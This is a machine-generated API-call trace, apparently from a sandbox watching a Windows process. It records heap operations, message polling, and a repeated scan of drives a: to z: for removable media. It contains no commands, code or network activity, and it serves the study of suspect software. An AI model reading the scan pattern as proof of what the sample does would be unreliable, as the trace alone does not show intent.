0x1 [0215.737] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.737] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.737] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.737] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.737] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.737] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0215.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.739] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.739] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.739] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.739] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.739] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.742] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.743] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.743] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0215.743] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0215.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.743] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0215.743] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0215.743] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.743] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.744] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.744] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.744] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.744] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.744] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.744] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0215.744] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.744] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0215.744] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0215.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.744] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0215.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0215.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.744] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.744] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.745] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.745] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.745] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.745] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.746] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.746] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.746] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.747] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.747] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.747] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.747] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.747] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.747] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.748] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.748] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.748] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.748] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.749] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.749] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.749] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.749] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.749] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.749] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.750] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.750] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.750] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.750] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.750] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.756] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.756] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.756] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.756] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.756] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.756] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.756] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.757] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.757] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.757] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.757] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.757] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.757] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0215.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0215.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0215.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.757] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0215.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.757] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0215.757] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0215.757] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0215.758] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.758] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.758] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.758] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.759] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.759] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.759] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.759] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.759] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0215.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.760] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.760] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.760] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.760] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.760] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.760] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.761] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.761] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.761] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.761] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.761] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.761] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.762] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.762] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.762] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.762] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.762] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.763] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.763] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.763] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.763] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.763] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.764] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.764] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.764] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.764] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.764] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.764] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0215.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.766] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.767] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0215.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0215.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0215.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0215.767] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0215.767] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.768] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.768] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.768] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.768] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0215.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0215.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0215.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0215.769] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.769] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.769] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.769] GetDriveTypeW (lpRootPathName="c:\\") 